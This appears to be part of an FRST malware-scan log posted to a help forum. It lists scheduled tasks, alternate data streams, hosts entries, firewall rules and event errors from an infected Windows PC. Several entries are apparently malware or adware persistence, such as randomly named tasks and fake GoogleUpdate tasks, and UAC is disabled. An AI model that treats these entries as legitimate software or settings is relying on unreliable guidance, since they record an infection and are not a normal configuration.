Task: {3AF24C5B-AA9E-400C-9823-0632119078A6} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {43344108-F38A-47C2-8354-25FF3F9A5E00} - System32\Tasks\IBUpd2 => C:\Users\owner\AppData\Local\BrowserAir\47.0.0.3\updater.exe
Task: {4483CAD1-273A-460E-BCD1-7528ABC6361C} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
Task: {49E18F13-C232-46E5-B2B9-CB9A6B05EDAF} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {4B4EA442-4CBE-431C-A8F1-9A6A94D2A2C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main => 50000,1
Task: {4D7C72BC-0587-426B-A153-339DDDE59812} - System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D => C:\Program Files\Explore\iexloprer.exe [2016-01-09] (Microsoft)
Task: {52059878-BC54-47DF-9E6E-CBA49724460E} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {568AAEFF-F3D4-49CE-93DF-AFFCF6ADABF0} - System32\Tasks\Foebyyc => C:\PROGRA~1\GROOVE~1\Sovri.bat
Task: {5D102AA7-504E-4431-A61D-C495A561C3E3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {6A06F2E2-A9E3-4D48-8BA2-0A8D99B9B386} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {7213CECA-856F-49B0-9BE8-1A0D716FF580} - System32\Tasks\GNU_635879831225933307 => C:\Users\owner\AppData\Roaming\SafeWeb\gsw.exe
Task: {775F46EB-0A69-4534-BCF9-78E95CFD1A8E} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
Task: {850B6F24-BFEA-4BDC-BB72-E7C8F2C5D23E} - System32\Tasks\Opera scheduled Autoupdate 1452386042 => C:\Program Files (x86)\Opera\launcher.exe
Task: {86C4588C-6DEB-4673-A725-802728388B8C} - System32\Tasks\WebDnsio2-daily => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {889A02E4-9406-4332-950C-98E052F215FD} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {8941FF4A-455A-4F4B-9F2E-1DCD660A1FDE} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Task Host\taskhost.exe [2016-01-09] (Microsoft)
Task: {A23E1D8E-B2C8-4179-8E36-5F1D94FEB50A} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3773202632-424774445-890114178-1001
Task: {A4561249-F93C-42DD-9156-9C763476AE13} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
Task: {A477CF67-A8F7-4DE2-B002-921BDC79B211} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {AAEA193D-3DD3-4D12-B57E-AD3C71C7F783} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
Task: {AFB865ED-9145-4839-81CC-EB2D84F61DFB} - System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412 => C:\Program Files\IIS\iis.exe [2016-01-09] (Microsoft)
Task: {B3552ACF-EA18-40A2-9D83-B3EBA7173A0C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {B62A1854-5E8B-4971-A249-401D4464FF54} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {BBCA6AF3-1387-4A66-837F-B9936560FBB0} - System32\Tasks\Olunnuag => C:\ProgramData\Olunnuag\1.0.7.1\evmihlus.exe
Task: {BD4E8E43-4441-4A4B-8137-BE0060B0F289} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {C80AA8E6-C6C0-4160-B234-B2589888E728} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
Task: {CFC03435-6807-4B22-8F28-92616C6160D2} - System32\Tasks\DriverNavigator Scheduled Scan => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: {D0395F3B-097A-47A4-A07D-D3977F7D3FD0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {D1BE1EA4-7412-4A4B-9468-76D0C35F4DE6} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
Task: {D1D5F7D9-DFF0-4F73-BE19-8BA1E5BA3000} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P => C:\WINDOWS\system32\WindowsPowerShell\taskprocess.exe [2016-01-09] (gltstech.net)
Task: {DBE9B34A-58C0-4CC7-B79B-D7498B9DD164} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
Task: {DC75A548-011F-44B6-AE74-CDA52157237D} - System32\Tasks\WebDnsio2 => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {E06DA7D4-9D01-4CBE-80C7-A4BFD6357661} - System32\Tasks\Goose => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll [2016-01-09] (Birds365)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DriverNavigator Scheduled Scan.job => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Goose.job => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
 
Here's the last bite of txt



==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2011-03-16 23:07 - 2011-03-16 23:07 - 04297568 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-06-21 17:12 - 2012-06-21 17:12 - 01407568 _____ () C:\Program Files (x86)\EgisTec MyWinLocker\x64\LIBEAY32.dll
2015-12-13 15:06 - 2015-12-13 15:06 - 00105984 _____ () C:\Program Files (x86)\NCH Software\ExpressZip\ezcm64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{34363237-b738-11e5-8285-b888e3a64cff}
AlternateDataStreams: C:\WINDOWS\system32\Drivers\sdfhgdf.sys:{34363238-b738-11e5-8285-b888e3a64cff}

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Kefzha => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 05:25 - 2016-01-09 16:29 - 00000967 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3773202632-424774445-890114178-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\owner\Desktop\New folder\League Of Legends\anniieee.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{45AFC69B-DD85-491F-A121-0FE3CD033EE4}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{4130F6DC-3B45-4354-A49C-FBAD53119841}] => (Allow) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{0FFFD599-15B6-4858-80E6-7E8449CB35BF}] => (Allow) C:\Program Files (x86)\Acer\Acer Cloud\ccd.exe
FirewallRules: [{5A612CFD-EC4E-405A-A0B2-408B38B82BEF}] => (Allow) C:\Program Files (x86)\Acer\Acer Cloud\ccd.exe
FirewallRules: [{50225025-660C-4102-83C6-FC8803490270}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\WindowsUpnp.exe
FirewallRules: [{F79F52EC-0051-4597-99C6-50FC6511DD76}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\WindowsUpnp.exe
FirewallRules: [{D0008F95-E587-4738-B434-8469678CAF6C}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\DMCDaemon.exe
FirewallRules: [{2372B709-583A-4CA1-8B39-3A3B00BFE118}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Photo\DMCDaemon.exe
FirewallRules: [{FBAFC8A2-3D85-4EBA-8BD9-CC33426247C9}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Movie\PlayMovie.exe
FirewallRules: [{661E39FE-A22C-4FF3-9C42-438D8B6252D1}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\MusicPlayer.exe
FirewallRules: [{ADD89591-BF1D-4A9E-8CB6-5FADAB2F65BD}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{6EC0726F-932C-4F82-A2C4-F27A6C774D21}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\WindowsUpnpMV.exe
FirewallRules: [{D18EF725-A515-48B4-AA17-58A6021DA880}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\WindowsUpnpMV.exe
FirewallRules: [{196AA019-79B8-4BFB-9F13-856ED2E77025}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\DMCDaemon.exe
FirewallRules: [{087A0E6D-C921-4258-A987-A1EECF0D98BE}] => (Allow) C:\Program Files (x86)\Acer\clear.fi Media\DMCDaemon.exe
FirewallRules: [{957139A4-98EE-42C2-B5AA-51A269DE88BE}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{382E3C32-7A8A-40EE-8CBF-4C700B59B1E2}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{03CEFACE-01E8-4DF6-8929-CCD5BFFB4D31}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{748587E8-CA09-41CE-84AF-3866BD51D39D}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{E85DAA5B-5347-4398-8862-0791C240EF99}] => (Allow) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
FirewallRules: [{1B8B50EA-455F-4836-AA1A-FE1CCD4070E2}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\FileExplorer.exe
FirewallRules: [{0B1C6426-DE02-4BE3-9BE4-C8D7AA5B9F3B}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
FirewallRules: [{45D560FA-E29D-483B-AAE9-89B06D273334}] => (Allow) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManager.exe
FirewallRules: [{862083EF-C645-422D-B63B-D4B591E79347}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{496BAAEC-1EEA-4342-9368-F2CA236BF833}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A602A103-F637-46DC-A7B1-AD2D8BC9C5B3}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F46B58C5-67AA-4520-B0B6-90F3003FA328}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{72BDFD15-1D3C-4A36-9169-132C84E2BDED}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{D49ABA06-CD5E-4A24-B168-304FDEF23904}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Spelunky\Spelunky.exe
FirewallRules: [{54DD60BA-0703-404D-B3DD-A8C48E6527FA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bloody Trapland\Bloody Trapland.exe
FirewallRules: [{03671CCF-F445-46EA-88F5-5B83727C2905}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Bloody Trapland\Bloody Trapland.exe
FirewallRules: [{4884F52E-8313-4EC3-BCF2-1C4B4338476D}] => (Allow) C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{8D8AE82D-DA33-451E-9108-EABAAFF48AD8}] => (Allow) C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6CD803A6-6D40-4EE2-993E-4CCCB190C24F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{09C531A4-AF25-4C8E-A7A9-4D8894DB5DDD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DB461A63-FE1C-4ABF-856E-FEDC49440827}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{6B2A2449-DBEE-418A-B769-747D260C3191}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe
FirewallRules: [{1AD76F74-BB66-4FC2-B32C-FD0157E51F0D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BattleBlock Theater\BattleBlockTheater.exe
FirewallRules: [{985A62D7-2625-4CEC-9FCB-C0746AC37E74}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BattleBlock Theater\BattleBlockTheater.exe
FirewallRules: [{C2054F28-7AEF-4491-B6F0-A2C7414B9195}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Broforce\Broforce_beta.exe
FirewallRules: [{4712CD1F-307D-4A3D-9A14-AC6FF380D125}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Broforce\Broforce_beta.exe
FirewallRules: [{3FE407AE-5250-4459-ABDE-24ED2CC6E583}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\To the Moon\To the Moon.exe
FirewallRules: [{4076E0CF-810A-4FF3-B4AD-AF06FDEA8566}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\To the Moon\To the Moon.exe
FirewallRules: [{B62A2FEF-D57D-4387-9D11-65BC412A88CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_1\Sigmund Holiday Special 1\Siggy - Holiday Special.exe
FirewallRules: [{277C55A8-7073-432B-A447-A2E728429E93}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_1\Sigmund Holiday Special 1\Siggy - Holiday Special.exe
FirewallRules: [{AB498CEE-CC1A-4951-BADC-1CA3CF7B9E45}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_2\Sigmund Holiday Special 2\SigCorp Minisode 2.exe
FirewallRules: [{01F95391-ED01-4F64-9018-B6100F39FEAF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\To the Moon\Minisode_2\Sigmund Holiday Special 2\SigCorp Minisode 2.exe
FirewallRules: [TCP Query User{72AA06B1-F211-4A33-9E5B-BDA97F16FEC8}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{CC91630A-F57E-45BC-9C16-DA8830869D75}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{3D3FDDFC-5839-4C00-B16D-BF6AF86422A1}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{7BC13CB3-B503-477D-BB1A-4817324D0E29}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{7C9DF681-98A8-4176-9F02-5AB9EEA917FB}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C60277F5-5041-4E73-BF63-84E549C3AC88}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{CC720A29-8931-48C1-8E80-649F39CB194F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{9742C07E-293C-499D-A5CF-A4F7BB7606EB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
FirewallRules: [{260B72E1-4C59-4FC7-A5E1-8E7980A6D4CB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{1162A9B5-A0E0-435B-A906-0015B6C17402}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{974D5DA0-1536-470E-B3CC-4DDA61DB8CF6}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{CE8A303A-859B-43FF-92FE-87B1FCDD5242}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [TCP Query User{46EBF09F-525F-48F7-A97C-2B2255771C95}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{0951722D-11EC-4AE5-BF45-21B90D5BD52A}C:\users\owner\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\owner\appdata\roaming\spotify\spotify.exe
FirewallRules: [{27939F77-18D9-4B61-8B4A-55CE4F5B1D16}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9C84E526-1D5D-41C5-98A5-836AA8D7B895}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{9F6EFC5C-20F7-4240-A6F4-FAAADDC79222}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{D44CFE24-34B8-4A45-BF4F-55E86AC5979F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{22CD5A1C-FB0F-4FF3-9DDA-E5D4B45D980D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gun Monkeys\Gun_Monkeys.exe
FirewallRules: [{C060BB13-ED23-4D11-8E60-08B9E10BDD06}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Gun Monkeys\Gun_Monkeys.exe
FirewallRules: [{7F89ED06-FFA5-4832-B5D2-E66EC2F3B4CF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{B5BD51EF-44B0-488D-87AE-B81B4071E1BB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Life Is Strange\Binaries\Win32\LifeIsStrange.exe
FirewallRules: [{7117A913-5AED-4B50-BC2F-7DF69C08CCE5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{9971C14D-96AA-4771-B823-0152D1C82A1C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{7A073EC5-3560-4A9E-B576-F430389C8052}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{769AB8F8-1A8D-455B-9FCA-AAFE99FB723B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{2C4B7454-65B6-4F39-AC70-EF99AB8E524F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{697880E0-5C2C-4C28-BB8F-BCC38B87ED07}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{9B228ACE-74CA-40C0-AFD3-A02AECB790C0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{13D640F0-DB7C-478D-A94C-7B7133ED9252}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{97F58A83-949F-4ED4-9D5B-0DAC4E3482DA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.exe
FirewallRules: [{479C317A-0E09-45AB-916C-EDE9A725D7B5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Warframe.x64.exe
FirewallRules: [{D251FB94-1CF8-4A0A-816E-8E4DD0976927}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\Launcher.exe
FirewallRules: [{CFEF7D67-A115-421C-88B1-C9608D593AA9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Warframe\Tools\RemoteCrashSender.exe
FirewallRules: [{1E179886-2923-4B86-B7F6-EC1A4FE3D58F}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{484535D1-A913-4A7B-AF6E-61EBB017A62A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{DF5FFCA8-6F8C-439B-995F-712D19620BAA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{948FCA58-8B00-4931-A9B5-3EE57B4A5A6E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{DDA6E56A-92FA-4EF2-B766-F781DF517D5E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{231C9584-4FBD-49BC-AF86-122B2D84AC79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 3\FalloutLauncher.exe
FirewallRules: [{181A1372-B41E-4D0E-B02A-14BB04F2F224}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout 3\FalloutLauncher.exe
FirewallRules: [{A4B47712-3BCB-4105-8BF3-E2064799EB3A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2E901D8E-2865-4268-A369-5EC5F867E35E}] => (Allow) C:\Users\owner\AppData\Local\BrowserAir\Application\BrowserAir.exe

==================== Restore Points =========================

25-12-2015 14:53:26 Scheduled Checkpoint
27-12-2015 17:03:55 Installed HP Support Solutions Framework
03-01-2016 21:22:49 Removed League of Legends

==================== Faulty Device Manager Devices =============

Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (01/10/2016 08:49:32 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Explorer.EXE version 6.3.9600.17667 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 7f4

Start Time: 01d14c2ac4b20d21

Termination Time: 0

Application Path: C:\WINDOWS\Explorer.EXE

Report Id: 5c1c1960-b81e-11e5-8297-68942386c715

Faulting package full name:

Faulting package-relative application ID:

Error: (01/10/2016 08:48:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPSF.exe, version: 8.1.40.3, time stamp: 0x5608c28a
Faulting module name: KERNELBASE.dll, version: 6.3.9600.17415, time stamp: 0x54505737
Exception code: 0xe0434352
Fault offset: 0x0000000000008b9c
Faulting process id: 0xfe8
Faulting application start time: 0xHPSF.exe0
Faulting application path: HPSF.exe1
Faulting module path: HPSF.exe2
Report Id: HPSF.exe3
Faulting package full name: HPSF.exe4
Faulting package-relative application ID: HPSF.exe5

Error: (01/10/2016 08:48:56 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: HPSF.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.TypeInitializationException
Stack:
at HP.SupportAssistant.Engine.DeviceDetect.DeviceDetection.get_Instance()
at HP.SupportAssistant.Engine.HPSAContext.ReloadDeviceActionItemCollection()
at HP.SupportAssistant.Engine.Utils.HPSAUtil.UpdateTaskbarForDetectedIssues()
at HP.SupportAssistant.HPSA_UI.App.RunScheduleTaskCleanup(System.Object)
at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
at System.Threading.ThreadHelper.ThreadStart(System.Object)

Error: (01/10/2016 04:13:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPSF.exe, version: 8.1.40.3, time stamp: 0x5608c28a
Faulting module name: KERNELBASE.dll, version: 6.3.9600.17415, time stamp: 0x54505737
Exception code: 0xe0434352
Fault offset: 0x0000000000008b9c
Faulting process id: 0xd58
Faulting application start time: 0xHPSF.exe0
Faulting application path: HPSF.exe1
Faulting module path: HPSF.exe2
Report Id: HPSF.exe3
Faulting package full name: HPSF.exe4
Faulting package-relative application ID: HPSF.exe5

Error: (01/10/2016 04:13:47 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: HPSF.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.TypeInitializationException
Stack:
at HP.SupportAssistant.Engine.DeviceDetect.DeviceDetection.get_Instance()
at HP.SupportAssistant.Engine.HPSAContext.ReloadDeviceActionItemCollection()
at HP.SupportAssistant.Engine.Utils.HPSAUtil.UpdateTaskbarForDetectedIssues()
at HP.SupportAssistant.HPSA_UI.App.RunScheduleTaskCleanup(System.Object)
at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
at System.Threading.ThreadHelper.ThreadStart(System.Object)

Error: (01/10/2016 03:51:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPSF.exe, version: 8.1.40.3, time stamp: 0x5608c28a
